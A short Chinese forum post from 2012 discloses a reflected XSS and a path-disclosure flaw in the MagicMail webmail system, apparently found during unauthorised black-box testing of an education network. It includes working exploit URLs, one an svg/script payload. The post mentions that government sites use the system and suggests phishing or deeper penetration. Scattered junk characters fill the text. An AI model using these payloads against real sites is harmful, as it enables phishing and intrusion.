今天上午在黑盒测试本地的教育网的时候发现的一个邮件系统漏洞
. Y9 I* s. s( [' ~5 U
6 Z A( n* l% D% Y2 r6 v/ ?* P- L
: A* [) F6 i/ A3 b7 C包含 一个反射性XSS 以及 绝对路径泄漏
# W [5 [3 m. A$ [8 P, ~+ w看了看 貌似全部是linux的。
& j, a. Q9 k7 H* N5 l( s- Z. ^
; U+ c. h% y; C, i/ j5 O' T- Z关键字:迈捷邮件系统 by MagicMail8 F" y7 O7 R! O* E
: @. J9 I# _0 P: o; l7 p) p可以看到很多政府网站都用这个邮件系统4 ~8 @9 A V [) N8 u+ L; N+ k
3 O- T) X/ A; y' e: b/ t: P& n' q
绝对路径 http://madman.in/index.php?login_type=declare&language=% O5 q: `3 z! b" Q6 G
o0 l1 c# f! e
l* [( t K4 a/ M" j9 d
% c7 [1 i. V/ ZXSS:http://madman.in/index.php?login_type=declare&language=–%3E%27%22%3E%3Csvg%3E%3Cscript/xlink:href=data:,while%28true%29{alert%281%29}%3E%3C/script%3E4 Q- V# r( s5 I S _2 z
6 L' m* F% \' K9 p& F6 i" s
1 b1 C- R; v- z, c
T0 A* O$ V1 e' J [7 X7 `虽然危害不是很大,不过利用起来还是可以的 比如 钓鱼 比如进一步的渗透 等等; \1 G. M* ]% N. U; l" V [0 D
5 N8 R7 G& z) z* v- c) ^
修复方案:看官方补丁吧。
6 U6 q! H5 ]4 A7 J: u |
发表于 2012-11-9 20:38:41
收藏
支持
反对